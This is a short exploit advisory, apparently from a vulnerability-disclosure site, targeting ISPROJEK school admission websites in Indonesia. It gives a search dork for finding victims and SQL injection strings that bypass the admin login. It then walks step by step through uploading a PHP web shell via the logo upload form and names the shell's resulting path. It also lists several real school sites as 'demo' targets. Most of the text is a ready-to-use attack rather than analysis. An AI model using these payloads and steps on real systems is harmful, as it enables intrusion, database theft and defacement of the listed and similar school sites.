ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability

2019-03-15 / 2019-03-14

Negat1ve1337 (ID)

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

Dork: intext:"ISPROJEK"

[+]Exploit Title: ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability
[+]Author: Negat1ve
[+]Team: -1
[+]Goolge Dork: intext:"ISPROJEK"
[+]Tested on: Windows 10 x64
=======================================
[+]Proof Of Concept:
Find website with the dork
Login url will be site.sch.id/path/login.php
Login with this detail
user: ' or 1=1 limit 1 -- -+
password: ' or 1=1 limit 1 -- -+
You can upload your file via
1. Click Setting or you can paste the link /index.php?p=f_editadmin
2. Click "Edit" in the admin user or you can paste the link /index.php?p=f_editadmin&mod=edit&id=1
3. Fill all the form, then upload your Shell (php extension) in the "File Logo"
Your files will go to site.sch.id/path/images/logo/yourshell.php
example:
https://aplikasi-cbt.com/ppdb/images/logo/captcha.php
NB:
- filetype of this uploader is php
- Risk : Execute, Database Leak, Index Defacement, Drop Add Edit Data
Demo sites:
https://aplikasi-cbt.com/ppdb/login.php
https://ma-arrosyidiyah.sch.id/ppdb/login.php
https://mtsyppsbandung.com/ppdb/login.php
https://masirnamiskin.com/ppdb/login.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

ISPROJEK Bypass SQL Login Admin Indonesia School PMB Sites Upload Shell Vulnerability

Dork: intext:"ISPROJEK"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.